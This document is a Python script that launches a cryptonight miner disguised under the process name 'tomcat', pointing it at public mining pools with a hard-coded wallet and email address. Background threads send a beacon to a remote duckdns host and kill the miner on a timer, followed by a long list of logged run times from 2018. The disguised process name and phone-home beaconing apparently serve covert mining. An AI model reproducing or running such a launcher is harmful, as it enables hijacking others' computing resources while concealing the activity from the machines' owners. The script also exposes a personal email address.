import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:34:01.926001
#2018-02-17 16:20:01.400861
#2018-02-17 18:07:05.232683
#2018-02-17 19:54:05.613725
#2018-02-17 21:43:04.311339
#2018-02-17 23:27:01.903543
#2018-02-18 01:17:05.001136
#2018-02-18 03:04:01.589256
#2018-02-18 04:51:05.506351
#2018-02-18 06:42:05.475152
#2018-02-18 08:31:07.353509
#2018-02-18 10:20:01.419848
#2018-02-18 12:06:01.699233
#2018-02-18 13:51:05.199477
#2018-02-18 15:43:01.358293
#2018-02-18 17:33:06.583262
#2018-02-18 19:21:07.578031
#2018-02-18 21:06:06.404512
#2018-02-18 22:53:05.010550
#2018-02-19 00:41:01.652352
#2018-02-19 02:27:01.867156
#2018-02-19 04:14:01.623987
#2018-02-19 05:58:05.051016
#2018-02-19 07:46:06.555209
#2018-02-19 09:36:06.474603
#2018-02-19 11:25:09.808253
#2018-02-19 13:12:09.497648
#2018-02-19 15:01:05.195197
#2018-02-19 16:49:05.845424
#2018-02-19 18:36:04.804982
#2018-02-19 20:22:04.871829
#2018-02-19 22:12:06.482959
#2018-02-19 23:59:07.400432
#2018-02-20 01:45:06.280709
#2018-02-20 03:33:07.242659
#2018-02-20 05:20:02.004146
#2018-02-20 07:04:02.089981
#2018-02-20 08:49:07.675123
#2018-02-20 10:33:08.171786
#2018-02-20 12:18:08.893944
#2018-02-20 14:06:01.395462
#2018-02-20 15:51:01.443906
#2018-02-20 17:37:04.713137
#2018-02-20 19:27:05.932440
#2018-02-20 21:15:03.803627
#2018-02-20 23:01:07.824276
#2018-02-21 00:44:08.227028
#2018-02-21 02:29:05.699572
#2018-02-21 04:18:05.099900
#2018-02-21 06:07:04.027195
#2018-02-21 07:53:06.022947
#2018-02-21 09:40:09.172276
#2018-02-21 11:28:09.322726
#2018-02-21 13:18:01.258576
#2018-02-21 15:04:08.981741
#2018-02-21 16:54:01.499738
#2018-02-21 18:41:08.225222
#2018-02-21 20:26:03.723260
#2018-02-21 22:16:06.361366
#2018-02-22 00:04:07.595278
#2018-02-22 01:52:04.241228
#2018-02-22 03:39:05.266217
#2018-02-22 05:26:03.652540
#2018-02-22 07:11:07.223644
#2018-02-22 08:57:08.017847
#2018-02-22 10:45:04.756914
#2018-02-22 12:32:10.908169
#2018-02-22 14:18:07.322336
#2018-02-22 16:06:07.984757
#2018-02-22 17:52:07.072316
#2018-02-22 19:42:01.362347
#2018-02-22 21:33:07.610385
#2018-02-22 23:20:01.446479
#2018-02-23 01:08:08.962819
#2018-02-23 02:54:02.175951
#2018-02-23 04:33:06.708602
#2018-02-23 06:20:07.293942
#2018-02-23 08:07:06.775898
#2018-02-23 10:20:04.848163
#2018-02-23 12:13:03.982115
#2018-02-23 14:01:06.224510
#2018-02-23 15:53:08.759644
#2018-02-23 17:38:02.164426
#2018-02-23 19:25:01.313745
#2018-02-23 21:08:06.012819
#2018-02-23 22:54:06.113443
#2018-02-24 00:42:06.247936
#2018-02-24 02:33:01.887930
#2018-02-24 04:27:01.720833
#2018-02-24 06:12:08.044466
#2018-02-24 07:59:07.628820
#2018-02-24 09:43:06.472021
#2018-02-24 11:39:04.789578
#2018-02-24 13:29:04.286068
#2018-02-24 15:17:06.698593
#2018-02-24 17:06:07.473860
#2018-02-24 18:58:01.398460
#2018-02-24 20:45:04.035465
#2018-02-24 22:59:03.968100
#2018-02-25 02:17:04.930155
#2018-02-25 05:35:04.213862
#2018-02-25 11:34:07.006374